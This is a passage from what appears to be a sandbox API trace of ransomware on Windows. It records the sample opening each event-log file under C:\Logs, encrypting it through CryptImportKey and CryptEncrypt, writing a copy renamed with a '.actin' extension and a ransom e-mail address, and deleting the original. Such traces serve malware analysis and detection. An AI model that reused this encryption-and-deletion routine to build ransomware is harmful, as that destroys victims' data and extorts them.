pdwDataLen=0x37afe28*=0x80) returned 1 [0065.200] CryptDestroyKey (hKey=0xf72000) returned 1 [0065.200] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0065.200] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0065.200] CloseHandle (hObject=0x30c) returned 1 [0065.200] CloseHandle (hObject=0x2e4) returned 1 [0065.202] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 1 [0065.203] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0065.204] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0065.211] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1052672) returned 1 [0065.211] CloseHandle (hObject=0x328) returned 1 [0065.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 0x20 [0065.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.211] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0065.211] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0065.211] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0065.211] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0065.213] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71fc0) returned 1 [0065.213] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0065.213] ReadFile (in: hFile=0x328, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x101000, lpOverlapped=0x0) returned 1 [0065.499] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010, dwBufLen=0x101010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010) returned 1 [0065.568] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x101010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x101010, lpOverlapped=0x0) returned 1 [0065.588] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72080) returned 1 [0065.588] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0065.588] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0065.588] CryptDestroyKey (hKey=0xf72080) returned 1 [0065.588] WriteFile (in: hFile=0x338, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0065.588] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0065.588] CloseHandle (hObject=0x328) returned 1 [0065.588] CloseHandle (hObject=0x338) returned 1 [0065.707] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 1 [0065.959] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0065.961] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0066.108] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.108] CloseHandle (hObject=0x2e4) returned 1 [0066.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 0x20 [0066.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.108] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0066.109] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.109] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.109] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.110] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72040) returned 1 [0066.110] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.110] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.119] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.119] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.121] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71f80) returned 1 [0066.121] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.121] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80, dwBufLen=0x80 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x80) returned 1 [0066.121] CryptDestroyKey (hKey=0xf71f80) returned 1 [0066.121] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x132, lpOverlapped=0x0) returned 1 [0066.121] CryptDestroyKey (hKey=0xf72040) returned 1 [0066.121] CloseHandle (hObject=0x2e4) returned 1 [0066.121] CloseHandle (hObject=0x320) returned 1 [0066.124] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 1 [0066.127] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0066.127] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.127] CloseHandle (hObject=0x2e4) returned 1 [0066.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 0x20 [0066.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0066.127] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.127] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.127] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0066.128] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71f80) returned 1 [0066.128] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.128] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.139] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.139] WriteFile (in: hFile=0x24c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.141] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71bc0) returned 1 [0066.141] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.141] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xb0, dwBufLen=0xb0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xb0) returned 1 [0066.141] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0066.141] WriteFile (in: hFile=0x24c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x162, lpOverlapped=0x0) returned 1 [0066.141] CryptDestroyKey (hKey=0xf71f80) returned 1 [0066.141] CloseHandle (hObject=0x2e4) returned 1 [0066.141] CloseHandle (hObject=0x24c) returned 1 [0066.143] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx")) returned 1 [0066.145] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.145] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0066.153] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.153] CloseHandle (hObject=0x30c) returned 1 [0066.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 0x20 [0066.154] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.154] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0066.154] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.154] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.154] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.155] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71cc0) returned 1 [0066.155] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.155] ReadFile (in: hFile=0x30c, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.157] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.157] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.159] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d00) returned 1 [0066.159] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.159] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xb0, dwBufLen=0xb0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xb0) returned 1 [0066.159] CryptDestroyKey (hKey=0xf71d00) returned 1 [0066.159] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x162, lpOverlapped=0x0) returned 1 [0066.159] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0066.159] CloseHandle (hObject=0x30c) returned 1 [0066.159] CloseHandle (hObject=0x320) returned 1 [0066.162] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx")) returned 1 [0066.171] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.171] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.171] GetFileSizeEx (in: hFile=0x268, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.171] CloseHandle (hObject=0x268) returned 1 [0066.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 0x20 [0066.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.171] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.171] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.171] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.172] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.172] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71cc0) returned 1 [0066.172] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.172] ReadFile (in: hFile=0x268, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.173] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.174] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0066.175] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72040) returned 1 [0066.175] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.175] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0, dwBufLen=0xa0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0) returned 1 [0066.175] CryptDestroyKey (hKey=0xf72040) returned 1 [0066.176] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x152, lpOverlapped=0x0) returned 1 [0066.176] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0066.176] CloseHandle (hObject=0x268) returned 1 [0066.176] CloseHandle (hObject=0x320) returned 1 [0066.178] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx")) returned 1 [0066.179] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0066.179] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.179] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0066.179] CloseHandle (hObject=0x320) returned 1 [0066.179] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx")) returned 0x20 [0066.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.180] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.180] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.180] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0066.180] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0066.180] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71f40) returned 1 [0066.180] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0066.180] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0066.182] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0066.182] WriteFile (in: hFile=0x268, 